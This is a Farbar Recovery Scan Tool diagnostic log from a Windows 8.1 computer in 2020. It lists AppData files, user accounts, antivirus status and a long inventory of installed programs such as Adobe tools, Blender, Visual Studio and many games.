2016-08-03 17:39 - 2016-08-03 17:39 - 000001598 _____ () C:\Users\Tomika\AppData\Roaming\Pecture
2019-05-26 22:16 - 2019-05-26 22:16 - 000001354 _____ () C:\Users\Tomika\AppData\Roaming\PureRef.ini
2016-07-14 03:15 - 2016-06-25 13:58 - 003760289 _____ (KNIGHT ) C:\Users\Tomika\AppData\Roaming\Setup.exe
2017-03-03 18:32 - 2017-03-03 18:32 - 000000218 _____ () C:\Users\Tomika\AppData\Local\.recently-used.xbel
2019-04-28 23:18 - 2019-04-28 23:18 - 000001456 _____ () C:\Users\Tomika\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-05-01 16:56 - 2017-05-01 16:56 - 000000000 ___SH () C:\Users\Tomika\AppData\Local\LumaEmu
2018-09-30 20:56 - 2018-09-30 20:56 - 000000000 _____ () C:\Users\Tomika\AppData\Local\oobelibMkey.log
2017-03-03 18:45 - 2017-03-03 18:45 - 000000779 _____ () C:\Users\Tomika\AppData\Local\recently-used.xbel
2017-09-29 20:46 - 2017-09-29 20:46 - 027393556 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e1c5~0.tmp
2017-09-29 20:46 - 2017-09-29 20:46 - 000000000 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2ce~0.tmp
2017-09-29 20:46 - 2017-09-29 20:48 - 074558506 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2de~0.tmp
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
LastRegBack: 2020-10-22 20:18
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-10-2020
Ran by Tomika (23-10-2020 10:45:47)
Running from C:\Users\Tomika\Desktop
Windows 8.1 Pro (Update) (X64) (2016-05-02 17:09:48)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2643689781-145595849-2857803826-500 - Administrator - Disabled)
Guest (S-1-5-21-2643689781-145595849-2857803826-501 - Limited - Disabled)
Tomika (S-1-5-21-2643689781-145595849-2857803826-1001 - Administrator - Enabled) => C:\Users\Tomika
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7 Billion Humans (HKLM-x32\...\2056114425_is1) (Version: 1.0.32472 - GOG.com)
7-Zip 15.14 (x64) (HKLM\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.08 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.0.327 - Adobe Systems Incorporated)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.445 - Adobe)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Illustrator CC 2014 (HKLM-x32\...\{2B4B4082-8043-4646-8334-B0A29E641211}) (Version: 18.1.1 - Adobe Systems Incorporated)
Adobe InDesign CC 2018 (HKLM-x32\...\IDSN_13_0) (Version: 13.0 - Adobe Systems Incorporated)
Adobe InDesign CS6 (HKLM-x32\...\{CFB770D7-8D43-1014-922B-CC2715FADE3F}) (Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_0) (Version: 18.0.0 - Adobe Systems Incorporated)
Anaconda3 2020.02 (Python 3.7.6 64-bit) (HKLM\...\Anaconda3 2020.02 (Python 3.7.6 64-bit)) (Version: 2020.02 - Anaconda, Inc.)
Application Verifier x64 External Package (HKLM\...\{D9908CED-5ABB-FEE9-FC84-743F4D38637C}) (Version: 10.1.16299.15 - Microsoft) Hidden
Arduino (HKLM-x32\...\Arduino) (Version: 1.8.12 - Arduino LLC)
Assassin's Creed II (HKLM-x32\...\Uplay Install 4) (Version: - Ubisoft)
Atom (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\atom) (Version: 1.51.0 - GitHub Inc.)
Autodesk Desktop App (HKLM-x32\...\Autodesk Desktop App) (Version: 6.1.0.137 - Autodesk)
Autodesk Fusion 360 (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.9144 - Autodesk, Inc.)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Netfabb Standard version 2017 (HKLM\...\{7F33137F-253B-418F-8600-0CC68A279528}}_is1) (Version: 2017 - Autodesk netfabb)
Autodesk_Netfabb_Standard_ADLM (HKLM\...\{95E20DC3-CA0C-4040-976B-0B9194396EB0}) (Version: 1.0.0.0 - Autodesk) Hidden
Backup and Sync from Google (HKLM\...\{B109BD68-709A-485B-97E6-651FEB234AC9}) (Version: 3.51.3307.8076 - Google, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Blender (HKLM\...\{A0C803A1-310C-4EFF-B881-CA10CF7CD6A7}) (Version: 2.90.1 - Blender Foundation)
Blender (HKLM\...\{A239FF96-639F-4269-9673-E7ED60D5C74D}) (Version: 2.83.3 - Blender Foundation)
Blender (HKLM\...\{A6B045E1-6F1C-4FCD-936A-EE272B675EC8}) (Version: 2.81.1 - Blender Foundation)
Blender (HKLM\...\{EDFAE2A8-E73B-4CD1-9648-46A7E4434BDA}) (Version: 2.82.1 - Blender Foundation)
Blender (HKLM\...\{F343C69A-4ABA-434C-9C73-12A519D269CD}) (Version: 2.80.0 - Blender Foundation)
Bloody7 (HKLM-x32\...\Bloody3) (Version: 20.02.0002 - Bloody)
Call of Duty 2 version 1.3.0.0 (HKLM-x32\...\Call of Duty 2_is1) (Version: 1.3.0.0 - Mr DJ)
Call of Duty 4 - Modern Warfare (HKLM-x32\...\Call of Duty 4 - Modern Warfare_is1) (Version: - )
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\InstallShield_{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.7 - Activision)
Call of Duty: Modern Warfare 2 (HKLM-x32\...\Call of Duty: Modern Warfare 2_is1) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.71 - Piriform)
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version: - Progdigy Software S.A.R.L.)
DaVinci Resolve (HKLM\...\{395391BE-FF9A-4A2A-BA89-0EAE0DB0F37B}) (Version: 15.3.0008 - Blackmagic Design)
DaVinci Resolve Panels (HKLM\...\{B1782967-E600-4BBD-B2F1-AEF3F2FE0A12}) (Version: 1.2.1.0 - Blackmagic Design)
Desperados 3 (HKLM-x32\...\Desperados 3_is1) (Version: - )
Discord (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Discord) (Version: 0.0.308 - Discord Inc.)
Driver Booster 7 (HKLM-x32\...\Driver Booster_is1) (Version: 7.2.0 - IObit)
Epic Games Launcher (HKLM-x32\...\{C69A2919-0662-4390-9418-67C931B44C18}) (Version: 1.1.236.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Git version 2.28.0 (HKLM\...\Git_is1) (Version: 2.28.0 - The Git Development Community)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version: - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 86.0.4240.111 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
Grammarly for Microsoft® Office Suite (HKLM\...\{4A6C3487-B58C-4A7D-B224-499CA5F99A7B}) (Version: 6.7.217 - Grammarly) Hidden
Grammarly for Microsoft® Office Suite (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{b7cd3fad-1dd9-41df-9c0c-688b0f8cd287}) (Version: 6.7.217 - Grammarly)
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Human Resource Machine (HKLM-x32\...\1444812654_is1) (Version: 1.0.31924 - GOG.com)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5074 - Intel Corporation)
Java 10.0.1 (64-bit) (HKLM\...\{D33DF729-38BB-5651-9D40-93BFEFB5DCED}) (Version: 10.0.1.0 - Oracle Corporation)
Kite (HKLM\...\Kite) (Version: - Manhattan Engineering Inc)
Kits Configuration Installer (HKLM-x32\...\{86E59C8F-61D5-1782-A3CE-60AE7E4D7791}) (Version: 10.1.16299.15 - Microsoft) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Lindo 2.4.0 (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\fcf71806-bbf8-5201-910f-7499961bc8e8) (Version: 2.4.0 - Prixe)
LLVM (HKLM-x32\...\LLVM) (Version: 3.9.1 - LLVM)
Media Player Codec Pack 4.4.8 (HKLM-x32\...\Media Player - Codec Pack) (Version: 4.4.8 - Media Player Codec Pack)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Mendeley Desktop 1.17.6 (HKLM-x32\...\Mendeley Desktop) (Version: 1.17.6 - Mendeley Ltd.)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 83.0.478.50 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.129.37 - )
Microsoft Mathematics Add-in (64-bit) (HKLM\...\{E2C98732-F973-4985-A9C5-DC06178E16EE}) (Version: 2.0.040811.01 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{49e969a1-2990-464d-92b5-25f6f34573c6}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{d2c8df0e-f15d-4426-9e51-f13f329f9cb4}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.50.1 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1089.1204 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 3.1.3 (x64) (HKLM-x32\...\{f7152f3d-2c9d-4752-8a92-045a03b85f42}) (Version: 3.1.3.28628 - Microsoft Corporation)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 72.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 72.0.2 (x64 cs)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 68.1.2 - Mozilla)
Mozilla Thunderbird 68.12.1 (x86 cs) (HKLM-x32\...\Mozilla Thunderbird 68.12.1 (x86 cs)) (Version: 68.12.1 - Mozilla)
MSI Development Tools (HKLM-x32\...\{973CACA2-E018-065B-0580-F2784802E299}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
MY.GAMES GameCenter (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\GameCenter) (Version: 4.1561 - MY.COM B.V.)
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4393.1001 - Microsoft Corporation)
Nástroje korektúry balíka Microsoft Office 2013 - slovenčina (HKLM\...\{90150000-001F-041B-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4393.1001 - Microsoft Corporation)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.7 - Notepad++ Team)
Npcap (HKLM-x32\...\NpcapInst) (Version: 0.9990 - Nmap Project)
Nuked Cockroach Launcher 0.9.12 (HKLM-x32\...\Nuked Cockroach Launcher) (Version: 0.9.12 - Nuked Cockroach Studio)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.6.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.6.0.74 - NVIDIA Corporation)
NVIDIA Miracast Virtual Audio 378.78 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 378.78 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{C5C1C0F0-D62F-4DBF-81D4-D7EF397C228B}) (Version: 9.09.0814 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.4.10.0 - NVIDIA Corporation) Hidden
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
odrive (HKLM\...\{32AA7EE2-2DA0-4CD9-ACD1-5D205E7A3F63}) (Version: 1.00.6236 - Oxygen Cloud, Inc.) Hidden
odrive (HKLM-x32\...\{e6ab88b8-5dd2-44c5-8ef1-6c2a7b48199b}) (Version: 1.0.6236 - Oxygen Cloud, Inc.)
Open 3D Model Viewer (HKLM-x32\...\{EBDFEC36-5277-454F-875B-F0AA2CDC3C92}) (Version: 1.10.0000 - Alexander Gessler)
Origin91 (HKLM-x32\...\{ADC55813-F4DD-47AA-94F3-CA35E1447E26}) (Version: 9.10.00 - OriginLab Corporation)
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
PotPlayer-64 bit (HKLM\...\PotPlayer64) (Version: 200525 - Kakao Corp.)
PowDLL Converter 2.86 (HKLM-x32\...\PowDLL Converter) (Version: 2.86 - Nikolaos Kourkoumelis)
PPspliT (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\PPspliT) (Version: 1.17 - )
Profex (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{d7553a1d-aae9-4f43-a693-9dcc4e118c61}) (Version: 4.0.0 - doebelin.org)
Prusa3D version 2.2.9.1 (HKLM\...\Prusa3D_is1) (Version: 2.2.9.1 - Prusa Research a.s.)
PrusaSlicer version 2.2.0 (HKLM\...\PrusaSlicer_is1) (Version: 2.2.0 - Prusa Research s.r.o.)
PureRef (HKLM-x32\...\PureRef) (Version: 1.9.2 - Idyllic Pixel)
Python 3.7.5 (64-bit) (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{5e6d7bfa-46e9-4496-9ccd-e15816be8f0a}) (Version: 3.7.5150.0 - Python Software Foundation)
Python 3.7.5 Core Interpreter (64-bit) (HKLM\...\{6DC6BC71-F1FB-412D-A16A-2FE8C463E89F}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Development Libraries (64-bit) (HKLM\...\{5A54B213-36D8-40CB-9E55-D20864AEF3C8}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Executables (64-bit) (HKLM\...\{8864B390-4DFB-43AB-934B-F02C48577666}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 pip Bootstrap (64-bit) (HKLM\...\{2E590D5A-4E40-4C9C-AFF8-7CB80F085752}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Standard Library (64-bit) (HKLM\...\{45CB356A-C0DF-430E-B75F-7764DBA06DF9}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Utility Scripts (64-bit) (HKLM\...\{EFF40415-0D5B-4CBA-9080-3EE2DADB527C}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
qBittorrent 4.2.1 (HKLM-x32\...\qBittorrent) (Version: 4.2.1 - The qBittorrent project)
R for Windows 3.5.0 (HKLM\...\R for Windows 3.5.0_is1) (Version: 3.5.0 - R Core Team)
RDT (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\RDT) (Version: 0.7.28 - Gamers Net Inc)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8581 - Realtek Semiconductor Corp.)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 5.1.0.1120 - Samsung Electronics)
SDK ARM Additions (HKLM-x32\...\{7922BB77-0B59-840A-AC80-D560A34D75C5}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{C87DF65C-A672-7E08-A083-E7D48FE8DB70}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0370 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
SigmaPlot 11.0 (HKLM-x32\...\{B1A88375-BAB9-4081-B58F-A137FC6ED2A4}) (Version: 11.0 - Systat Software, Inc.)
Skype version 8.63 (HKLM-x32\...\Skype_is1) (Version: 8.63 - Skype Technologies S.A.)
StarCraft II Legacy of the Void (HKLM\...\U3RhckNyYWZ0SUk=_is1) (Version: 1 - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StyleWriter 4 (HKLM-x32\...\{D770F0F3-650B-4D7A-945D-49ADB1182BD9}) (Version: 4.02.02 - Editor Software (UK) Ltd)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
The Witcher 3: Wild Hunt - Game of the Year Edition (HKLM-x32\...\1495134320_is1) (Version: 1.32 - GOG.com)
They Are Billions (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\They Are Billions) (Version: - HOODLUM)
Universal CRT Extension SDK (HKLM-x32\...\{A5FA2886-1925-133F-0D41-B9A8ECEA0A2D}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{B739B4C5-EEEC-8E70-0276-38C4779AF398}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{A9D6F52C-694E-3E41-7AB8-5BEB644742A5}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{E053089E-7953-3219-814F-F485FC151C54}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{B9424F08-0617-C4F6-A798-5A9250C1A738}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{D261CEA1-AB8D-9CFA-4407-BCEFC78661AC}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-012B-0409-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 98.0 - Ubisoft)
vcpp_crt.redist.clickonce (HKLM-x32\...\{16E08161-F78C-4FFC-8E12-F9BEA280795F}) (Version: 14.16.27012 - Microsoft Corporation) Hidden
Visual Studio Community 2017 (HKLM-x32\...\aa5cdd5f) (Version: 15.9.28307.222 - Microsoft Corporation)
Visuino version 7.8.3.69 (HKLM-x32\...\Visuino_is1) (Version: - Mitov Software LLC)
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.24-2 - Wacom Technology Corp.)
Warface My.Com (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Warface My.Com) (Version: 1.131 - MY.GAMES)
Wasteland 3 (HKLM-x32\...\Wasteland 3_is1) (Version: - )
WinAppDeploy (HKLM-x32\...\{9690D51C-4435-1C20-7819-66CCAB0F03F9}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{350F0ECD-0783-4529-8797-98F0AD33EAC0}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.16299.15 (HKLM-x32\...\{6195c203-b53c-4bb7-983a-6070a902e704}) (Version: 10.1.16299.15 - Microsoft Corporation)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{385A1387-A488-9E90-3635-086129610034}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{D7DD3171-DA58-52A1-95B2-4769640855AF}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7336279F-8F8F-5530-A543-3BE963846C0A}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E414A474-0A87-4F66-C409-A4D9857CFD34}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{CE760B86-975B-F514-5673-0ED4332B801B}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{5E67F8BE-D8D2-257F-CE19-419A2D5125C7}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{A2AA063E-AF50-A1F5-8925-A06EB1556644}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{7D4C7F4A-02A9-E434-6451-C8787DF28C1F}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{BC467065-9374-5345-DA3F-FCF073304A25}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Wolfram Extras 11.0 (5597552) (HKLM\...\A-WIN-Extras 11.0.1 5597552_is1) (Version: 11.0.1 - Wolfram Research, Inc.)
